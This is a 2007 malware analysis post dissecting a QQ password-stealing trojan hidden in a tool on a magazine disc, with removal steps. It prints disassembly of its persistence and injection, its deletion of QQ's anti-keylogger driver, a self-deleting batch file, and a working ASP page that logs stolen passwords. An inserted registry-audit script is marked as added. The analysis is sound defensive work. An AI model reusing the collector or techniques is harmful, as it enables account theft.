Analysis of the QQ "black hand" on the Hacker Defense (黑防) disc - vulnerability warning - Black Bar Safety Net

2007-01-11T00:00:00
ID MYHACK58:62200713698
Type myhack58
Reporter 佚名 (anonymous)
Modified 2007-01-11T00:00:00

Description

Looking at the official announcement on the Hacker Defense (黑客防线) site: on this month's issue 6 disc, in the column I contribute to, the tool bundled with the "Dongwang (动网) forum vulnerability exploitation" animation sets off the antivirus, which reports Trojan-PSW.Win32.QQShou.ed. I thought I was already an old hand at this, and someone has out-hacked me. Truly the student surpassing the master...... So I analyzed this malicious program a bit, partly to gain some manual-removal experience for myself and partly to help friends who got infected clean it off completely. First, check the packer with PEiD: UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay]. There are plenty of UPX unpackers online, but I won't bother downloading one; PEiD's UPX FILEINFO plug-in gives you the OEP of a UPX-packed program easily.

Here the OEP is 4056D8. Load the file directly in OD, press F4 to run to 4056D8 and dump it there. Unpacking is finished. A second PEiD scan then reports Borland Delphi 6.0 - 7.0. Whether you repair the dump is up to you; we are not going to run it anyway. Load the unpacked program in OD and analyze it:

00404935  50               PUSH EAX
00404936  E8 71FCFFFF      CALL <JMP.&kernel32.GetSystemDirectoryA>   ; returns the Windows system directory path
0040493B  85C0             TEST EAX,EAX
0040493D  75 07            JNZ SHORT 2.00404946
0040493F  C685 00FFFFFF 43 MOV BYTE PTR SS:[EBP-100],43
00404946  8A85 00FFFFFF    MOV AL,BYTE PTR SS:[EBP-100]
0040494C  50               PUSH EAX
0040494D  E8 E2FCFFFF      CALL <JMP.&USER32.IsCharAlphaA>            ; checks whether the character is a letter
00404952  83F8 01          CMP EAX,1
00404955  1BC0             SBB EAX,EAX
00404957  40               INC EAX
00404958  84C0             TEST AL,AL
0040495A  75 07            JNZ SHORT 2.00404963
0040495C  C685 00FFFFFF 43 MOV BYTE PTR SS:[EBP-100],43               ; hex 43 = 'C': falls back to the C drive
00404963  8D85 FCFEFFFF    LEA EAX,DWORD PTR SS:[EBP-104]
00404969  8A95 00FFFFFF    MOV DL,BYTE PTR SS:[EBP-100]
0040496F  E8 CCEDFFFF      CALL 2.00403740
00404974  8B95 FCFEFFFF    MOV EDX,DWORD PTR SS:[EBP-104]
0040497A  8BC3             MOV EAX,EBX
0040497C  B9 B4494000      MOV ECX,2.004049B4                         ; :\program files\internet explorer\plugins
00404981  E8 2EEEFFFF      CALL 2.004037B4
00404986  33C0             XOR EAX,EAX
00404988  5A               POP EDX
00404989  59               POP ECX
0040498A  59               POP ECX

When the program runs, it first takes the drive letter of the system directory (defaulting to C if the first character is not a letter) and creates a file under C:\Program Files\Internet Explorer\PLUGINS. Go to that directory and you will find two extra files: a "dynamic link library" bow.sys and a bow.bak. How do you know they were generated by the Trojan? Look at the file creation dates. Note that these files are hidden, so you need to show all files to see them. Use OD to look at the contents of bow.sys:

003E4E1A |. 50              PUSH EAX                                  ; /pDisposition
003E4E1B |. 8D4424 04       LEA EAX,DWORD PTR SS:[ESP+4]              ; |
003E4E1F |. 50              PUSH EAX                                  ; |pHandle
003E4E20 |. 6A 00           PUSH 0                                    ; |pSecurity = NULL
003E4E22 |. 68 3F000F00     PUSH 0F003F                               ; |Access = KEY_ALL_ACCESS
003E4E27 |. 6A 00           PUSH 0                                    ; |Options = REG_OPTION_NON_VOLATILE
003E4E29 |. 6A 00           PUSH 0                                    ; |Class = NULL
003E4E2B |. 6A 00           PUSH 0                                    ; |Reserved = 0
003E4E2D |. 68 744E3E00     PUSH bow.003E4E74                         ; |software\msqqguishou
003E4E32 |. 68 01000080     PUSH 80000001                             ; |hKey = HKEY_CURRENT_USER
003E4E37 |. E8 54F4FFFF     CALL <JMP.&advapi32.RegCreateKeyExA>      ; \RegCreateKeyExA

It writes the registry key HKEY_CURRENT_USER\Software\MsQQGuishou. "QQGuiShou" is the pinyin of "QQ鬼手" (QQ Ghost Hand)? According to Google there is indeed a QQ-stealing tool by that name. Continuing the analysis:

:00407715 A124A14000   mov eax, dword ptr [0040A124]
:0040771A 8B4018       mov eax, dword ptr [eax+18]
:0040771D 50           push eax
:0040771E A124A14000   mov eax, dword ptr [0040A124]
:00407723 8B4014       mov eax, dword ptr [eax+14]
:00407726 50           push eax
Possible StringData Ref from Code Obj ->"QQ Blaster give you gifts! ->("
:00407727 68947A4000   push 00407A94
:0040772C FF75F8       push [ebp-08]
Possible StringData Ref from Code Obj ->"----"
:0040772F 68B87A4000   push 00407AB8
:00407734 FF75F4       push [ebp-0C]
:00407737 68C87A4000   push 00407AC8
:0040773C 8D45CC       lea eax, dword ptr [ebp-34]
:0040773F BA05000000   mov edx, 00000005
:00407744 E853BDFFFF   call 0040349C
:00407749 8B45CC       mov eax, dword ptr [ebp-34]
:0040774C 50           push eax
Possible StringData Ref from Code Obj ->" number:"
:0040774D 68D47A4000   push 00407AD4
:00407752 FF75F8       push [ebp-08]
Possible StringData Ref from Code Obj ->"---- password:"
:00407755 68E47A4000   push 00407AE4
:0040775A FF75F4       push [ebp-0C]
Possible StringData Ref from Code Obj ->"---- available game currency:"
:0040775D 68F87A4000   push 00407AF8
:00407762 8D55C4       lea edx, dword ptr [ebp-3C]
:00407765 8B45DC       mov eax, dword ptr [ebp-24]
:00407768 E8E7D7FFFF   call 00404F54
:0040776D FF75C4       push [ebp-3C]
Possible StringData Ref from Code Obj ->"---- save:"
:00407770 68147B4000   push 00407B14
:00407775 8D55C0       lea edx, dword ptr [ebp-40]
:00407778 8B45E0       mov eax, dword ptr [ebp-20]
:0040777B E8D4D7FFFF   call 00404F54
:00407780 FF75C0       push [ebp-40]
Possible StringData Ref from Code Obj ->"---- credits:"
:00407783 682C7B4000   push 00407B2C
:00407788 8D55BC       lea edx, dword ptr [ebp-44]
:0040778B 8B45EC       mov eax, dword ptr [ebp-14]
:0040778E E8C1D7FFFF   call 00404F54
:00407793 FF75BC       push [ebp-44]
Possible StringData Ref from Code Obj ->"---- whether it is a member:"
:00407796 68407B4000   push 00407B40
:0040779B 8D55B8       lea edx, dword ptr [ebp-48]
:0040779E 8B45D4       mov eax, dword ptr [ebp-2C]
:004077A1 E8AED7FFFF   call 00404F54
:004077A6 FF75B8       push [ebp-48]

Possible StringData Ref from Code Obj ->"---- grade:"
:004077A9 685C7B4000   push 00407B5C
:004077AE 8D55B4       lea edx, dword ptr [ebp-4C]
:004077B1 8B45D0       mov eax, dword ptr [ebp-30]
:004077B4 E89BD7FFFF   call 00404F54
:004077B9 FF75B4       push [ebp-4C]
Possible StringData Ref from Code Obj ->"---- game point:"
:004077BC 68707B4000   push 00407B70
:004077C1 8D55B0       lea edx, dword ptr [ebp-50]
:004077C4 8B45E4       mov eax, dword ptr [ebp-1C]
:004077C7 E888D7FFFF   call 00404F54
:004077CC FF75B0       push [ebp-50]

Possible StringData Ref from Code Obj ->"---- IP:"

"QQ Blaster gives you a gift!" It really is a gift: after querying the QQ site, it sends out all of your information as a present: QQ number, password, available game currency, whether you are a member (yes/no), points, level, game points and IP. That is what gets written into its own sys file, together with the configuration information later in the program. Heh, today's Trojans keep getting bigger and better.... It submits the data by POSTing an ASP web form, and the receiving page saves the password. Interested friends can capture the packets and look for themselves; I am not going to rob someone else of the fruits of their labor here. The ASP code that receives the password is as follows:

<%
LogFile="log.txt"
LogFileGB="LOGGB.txt"
QQNumber=request("Number")
QQPassWord=request("PassWord")
QQGBA=request("yxba")
QQGBB=request("yxbb")
if QQGBA="" then
  QQGBA="no"
end if
if QQGBB="" then
  QQGBB="no"
end if
LogText=QQNumber&"----"&QQPassWord
LogTextGB=QQNumber&"----"&QQPassWord&"---- QQGBA:"&QQGBA&"---- QQGBB:"&QQGBB
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&LogFile,8,true,0)
ff.writeline(LogText)
ff.close
set ff=nothing
set f=nothing
set f1=Server.CreateObject("scripting.filesystemobject")
set ff1=f1.opentextfile(server.mappath(".")&"\"&LogFileGB,8,true,0)
ff1.writeline(LogTextGB)
ff1.close
set ff1=nothing
set f1=nothing
%>

Next comes the persistence code:

00404AFB  55              PUSH EBP
00404AFC  68 A04B4000     PUSH 2.00404BA0
00404B01  64:FF30         PUSH DWORD PTR FS:[EAX]
00404B04  64:8920         MOV DWORD PTR FS:[EAX],ESP
00404B07  68 AC4B4000     PUSH 2.00404BAC
00404B0C  B9 B04B4000     MOV ECX,2.00404BB0   ; {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B11  BA D84B4000     MOV EDX,2.00404BD8   ; software\microsoft\windows\currentversion\explorer\shellexecutehooks
00404B16  B8 02000080     MOV EAX,80000002
00404B1B  E8 70FFFFFF     CALL 2.00404A90
00404B20  8D45 FC         LEA EAX,DWORD PTR SS:[EBP-4]
00404B23  BA 284C4000     MOV EDX,2.00404C28   ; clsid\{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B28  E8 8BEBFFFF     CALL 2.004036B8
00404B2D  68 AC4B4000     PUSH 2.00404BAC
00404B32  8B45 FC         MOV EAX,DWORD PTR SS:[EBP-4]
00404B35  E8 1EEEFFFF     CALL 2.00403958
00404B3A  8BD0            MOV EDX,EAX
00404B3C  B9 AC4B4000     MOV ECX,2.00404BAC
00404B41  B8 00000080     MOV EAX,80000000
00404B46  E8 45FFFFFF     CALL 2.00404A90
00404B4B  8D45 FC         LEA EAX,DWORD PTR SS:[EBP-4]
00404B4E  BA 604C4000     MOV EDX,2.00404C60   ; inprocserver32apartment
00404B53  E8 18ECFFFF     CALL 2.00403770

It writes the registry value 80000000 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}" (note that the listing above passes 80000002, HKEY_LOCAL_MACHINE, as the root for this key), and registers the COM component:

0012FF20  80000000  |hKey = HKEY_CLASSES_ROOT
0012FF24  00404C28  |Subkey = "CLSID\{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}"

Because the CLSID is registered as a ShellExecuteHook, Explorer loads its InprocServer32 (bow.sys) automatically. Finally it uses LoadLibrary to run the Trojan program.
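The persistence traced above (a CLSID under HKLM\...\Explorer\ShellExecuteHooks whose InprocServer32 points at bow.sys in the IE PLUGINS directory, plus the HKCU\Software\MsQQGuishou key) can be audited offline from a registry export. The Python below is an added example, not code from the original post: the .reg text is constructed, the allow-listed CLSID is a placeholder, and only the hook CLSID, the bow.sys path and the MsQQGuishou key are taken from the analysis.

```python
# Constructed .reg export (not captured from the infected machine in the write-up):
# the hook CLSID, the bow.sys path and the HKCU key are the values the analysis
# reports; the other hook CLSID is a placeholder standing in for a legitimate entry.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{00000000-1111-2222-3333-444444444444}"=""
"{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}"=""
[HKEY_CLASSES_ROOT\CLSID\{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}\InprocServer32]
@="C:\\Program Files\\Internet Explorer\\PLUGINS\\bow.sys"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\Software\MsQQGuishou]
"""
HOOKS_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\explorer\shellexecutehooks"
MARKER_KEY = r"hkey_current_user\software\msqqguishou"
KNOWN_GOOD = {"{00000000-1111-2222-3333-444444444444}"}  # placeholder allow-list

def parse_reg(text):
    """Parse a .reg export into {key path (lower-case): {value name: data}}."""
    keys, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1].lower()
            keys[cur] = {}
        elif cur is not None and line.startswith(('"', "@")) and "=" in line:
            name, _, data = line.partition("=")
            name = "@" if name == "@" else name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace("\\\\", "\\")  # undo .reg escaping
            keys[cur][name] = data
    return keys

def audit(keys):
    """Flag ShellExecuteHooks CLSIDs that are not allow-listed, resolving each one's
    InprocServer32 so the module Explorer would load is named in the finding."""
    findings = []
    for clsid in keys.get(HOOKS_KEY, {}):
        if clsid.upper() in KNOWN_GOOD:
            continue
        server_key = "hkey_classes_root\\clsid\\" + clsid.lower() + "\\inprocserver32"
        server = keys.get(server_key, {}).get("@", "")
        reasons = ["hook CLSID not on allow-list"]
        if not server.lower().endswith(".dll"):
            reasons.append("in-process server is not a .dll")
        if "\\internet explorer\\plugins\\" in server.lower():
            reasons.append("server sits in the IE PLUGINS drop directory")
        findings.append({"clsid": clsid.upper(), "server": server, "reasons": reasons})
    if MARKER_KEY in keys:  # the key bow.sys creates with RegCreateKeyExA
        findings.append({"clsid": None, "server": None, "reasons": ["MsQQGuishou key present"]})
    return findings
```

On a live machine the same checks apply to the output of `reg export` for the three hives, and any hook whose server is a hidden file or a non-DLL extension deserves a look.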

00404E56  8B95 2CFEFFFF   MOV EDX,DWORD PTR SS:[EBP-1D4]
00404E5C  8D45 FC         LEA EAX,DWORD PTR SS:[EBP-4]
00404E5F  B9 B44F4000     MOV ECX,2.00404FB4   ; microsoft.bat
00404E64  E8 4BE9FFFF     CALL 2.004037B4
00404E69  8B55 FC         MOV EDX,DWORD PTR SS:[EBP-4]
00404E6C  8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E72  E8 B1DBFFFF     CALL 2.00402A28
00404E77  8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E7D  E8 42D9FFFF     CALL 2.004027C4
00404E82  E8 11D7FFFF     CALL 2.00402598
00404E87  BA CC4F4000     MOV EDX,2.00404FCC   ; :try
00404E8C  8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E92  E8 55ECFFFF     CALL 2.00403AEC
00404E97  E8 A8DEFFFF     CALL 2.00402D44
00404E9C  E8 F7D6FFFF     CALL 2.00402598
00404EA1  68 DC4F4000     PUSH 2.00404FDC      ; del "
00404EA6  8D95 20FEFFFF   LEA EDX,DWORD PTR SS:[EBP-1E0]
00404EAC  33C0            XOR EAX,EAX
00404EAE  E8 41D8FFFF     CALL 2.004026F4
00404EB3  FFB5 20FEFFFF   PUSH DWORD PTR SS:[EBP-1E0]
00404EB9  68 EC4F4000     PUSH 2.00404FEC      ; "
00404EBE  8D85 24FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1DC]
00404EC4  BA 03000000     MOV EDX,3
00404EC9  E8 5AE9FFFF     CALL 2.00403828
00404ECE  8B95 24FEFFFF   MOV EDX,DWORD PTR SS:[EBP-1DC]
00404ED4  8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]
00404EDA  E8 0DECFFFF     CALL 2.00403AEC
00404EDF  E8 60DEFFFF     CALL 2.00402D44
00404EE4  E8 AFD6FFFF     CALL 2.00402598
00404EE9  68 F84F4000     PUSH 2.00404FF8      ; if exist "
00404EEE  8D95 18FEFFFF   LEA EDX,DWORD PTR SS:[EBP-1E8]
00404EF4  33C0            XOR EAX,EAX
00404EF6  E8 F9D7FFFF     CALL 2.004026F4
00404EFB  FFB5 18FEFFFF   PUSH DWORD PTR SS:[EBP-1E8]
00404F01  68 EC4F4000     PUSH 2.00404FEC      ; "
00404F06  68 0C504000     PUSH 2.0040500C      ; goto try
00404F0B  8D85 1CFEFFFF   LEA EAX,DWORD PTR SS:[EBP-1E4]
00404F11  BA 04000000     MOV EDX,4
00404F16  E8 0DE9FFFF     CALL 2.00403828      ; this CALL calls LoadLibrary to run the Trojan program
00404F1B  8B95 1CFEFFFF   MOV EDX,DWORD PTR SS:[EBP-1E4]
00404F21  8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F27  E8 C0EBFFFF     CALL 2.00403AEC
00404F2C  E8 13DEFFFF     CALL 2.00402D44
00404F31  E8 62D6FFFF     CALL 2.00402598
00404F36  BA 20504000     MOV EDX,2.00405020   ; del %0
00404F3B  8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F41  E8 A6EBFFFF     CALL 2.00403AEC
00404F46  E8 F9DDFFFF     CALL 2.00402D44
00404F4B  E8 48D6FFFF     CALL 2.00402598
00404F50  8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F56  E8 89DBFFFF     CALL 2.00402AE4
00404F5B  E8 38D6FFFF     CALL 2.00402598

I was debugging on the desktop, so a microsoft.bat file is generated on the desktop and executed through CMD. The microsoft.bat file exists to delete the original dropper (动网论坛提升工具.exe, the "Dongwang forum elevation tool") and then itself. Its contents are:

:try
del "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe"
if exist "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe" goto try
del %0

Finally, the process-handling sequence in bow.sys:

003E9B3D |. E8 7697FFFF     CALL bow.003E32B8
003E9B42 |. 68 D09D3E00     PUSH bow.003E9DD0                 ; ASCII "QQ.Exe"
003E9B47 |. A1 4CB83E00     MOV EAX,DWORD PTR DS:[3EB84C]
003E9B4C |. E8 8B9AFFFF     CALL bow.003E35DC
003E9B51 |. 8BD8            MOV EBX,EAX                       ; |
003E9B53 |. 53              PUSH EBX                          ; |String1
003E9B54 |. E8 4FA8FFFF     CALL <JMP.&kernel32.lstrcmpiA>    ; \lstrcmpiA
003E9B59 |. 85C0            TEST EAX,EAX
003E9B5B |. 75 7B           JNZ SHORT bow.003E9BD8
003E9B5D |. 8D45 B4         LEA EAX,DWORD PTR SS:[EBP-4C]
003E9B60 |. 8BD6            MOV EDX,ESI
003E9B62 |. B9 05010000     MOV ECX,105
003E9B67 |. E8 5898FFFF     CALL bow.003E33C4
003E9B6C |. 8B45 B4         MOV EAX,DWORD PTR SS:[EBP-4C]
003E9B6F |. 8D55 B8         LEA EDX,DWORD PTR SS:[EBP-48]
003E9B72 |. E8 25C6FFFF     CALL bow.003E619C
003E9B77 |. 8B55 B8         MOV EDX,DWORD PTR SS:[EBP-48]
003E9B7A |. B8 48B83E00     MOV EAX,bow.003EB848
003E9B7F |. E8 3497FFFF     CALL bow.003E32B8
003E9B84 |. 8D45 B0         LEA EAX,DWORD PTR SS:[EBP-50]
003E9B87 |. B9 E09D3E00     MOV ECX,bow.003E9DE0              ; ASCII "LoginCtrl.dll"
003E9B8C |. 8B15 48B83E00   MOV EDX,DWORD PTR DS:[3EB848]
003E9B92 |. E8 9198FFFF     CALL bow.003E3428
003E9B97 |. 8B45 B0         MOV EAX,DWORD PTR SS:[EBP-50]
003E9B9A |. E8 3D9AFFFF     CALL bow.003E35DC
003E9B9F |. 50              PUSH EAX                          ; /FileName
003E9BA0 |. E8 BBA7FFFF     CALL <JMP.&kernel32.LoadLibraryA> ; \LoadLibraryA
003E9BA5 |. A3 18A13E00     MOV DWORD PTR DS:[3EA118],EAX
003E9BAA |. 8D45 AC         LEA EAX,DWORD PTR SS:[EBP-54]
003E9BAD |. B9 F89D3E00     MOV ECX,bow.003E9DF8              ; ASCII "npkcrypt.sys"
003E9BB2 |. 8B15 48B83E00   MOV EDX,DWORD PTR DS:[3EB848]
003E9BB8 |. E8 6B98FFFF     CALL bow.003E3428
003E9BBD |. 8B45 AC         MOV EAX,DWORD PTR SS:[EBP-54]
003E9BC0 |. E8 179AFFFF     CALL bow.003E35DC
003E9BC5 |. 50              PUSH EAX                          ; /FileName
003E9BC6 |. E8 05A7FFFF     CALL <JMP.&kernel32.DeleteFileA>  ; \DeleteFileA
003E9BCB |. A1 28A13E00     MOV EAX,DWORD PTR DS:[3EA128]
003E9BD0 |. C700 FFFFFFFF   MOV DWORD PTR DS:[EAX],-1
003E9BD6 |. EB 1E           JMP SHORT bow.003E9BF6
003E9BD8 |> 68 089E3E00     PUSH bow.003E9E08                 ; /String2 = "Explorer.Exe"
003E9BDD |. 53              PUSH EBX                          ; |String1
003E9BDE |. E8 C5A7FFFF     CALL <JMP.&kernel32.lstrcmpiA>    ; \lstrcmpiA
003E9BE3 |. 85C0            TEST EAX,EAX
003E9BE5 |. 0F85 BB010000   JNZ bow.003E9DA6
003E9BEB |. A1 30A13E00     MOV EAX,DWORD PTR DS:[3EA130]
003E9BF0 |. C700 FFFFFFFF   MOV DWORD PTR DS:[EAX],-1
003E9BF6 |> 68 04010000     PUSH 104                          ; /BufSize = 104 (260.)
003E9BFB |. 56              PUSH ESI                          ; |PathBuffer
003E9BFC |. A1 50B63E00     MOV EAX,DWORD PTR DS:[3EB650]     ; |
003E9C01 |. 50              PUSH EAX                          ; |hModule => NULL
003E9C02 |. E8 09A7FFFF     CALL <JMP.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA

The module compares its host process name against "QQ.Exe" and "Explorer.Exe": inside QQ it loads LoginCtrl.dll and deletes npkcrypt.sys, and it inserts itself into the Explorer.exe process, a very common trick. Don't believe it? Use IceSword to look at the Explorer.exe process.

However, when the Trojan loads it deletes the npkcrypt.sys driver. According to Google, QQ2005 Beta3 and later versions integrate a keyboard-encryption component called npkcrypt, which is euphemistically said to protect the security of the user's password input but in fact installs a driver on the user's system without asking for consent. With this version installed the password can no longer be entered by pasting, which is why some Chinese QQ users could not log in. The Trojan deletes npkcrypt.sys and then runs the original QQ program so that it can set its hook and record the password you type. The Trojan registers itself as a service, so you will not see it in the startup items. With the analysis above we can delete the bow.sys file and the registry entries, and presumably get rid of this Trojan easily. But there is a complication: because our npkcrypt.sys driver has been removed, after the computer reboots a "talk service running error" warning window pops up.

Right-click "My Computer", select "Manage" -> "Device Manager", choose "View" / "Show hidden devices", and under "Non-Plug and Play Drivers" select "npkcrypt" and uninstall it (restarting is optional). Then run "regedit" from CMD and search the registry for "npkcrypt"; you may find keys such as HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\npkcrypt or HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\npkcrypt. Deleting them and rebooting generally solves the problem; search for npkcrypt.* on disk and delete those files too. OK, this little horse is dealt with. Finally, shame on whoever put this up: remember where your water comes from. After all, Hacker Defense is where we rookies started out; now that you've become a veteran, how can you bully the fledglings? Be kind.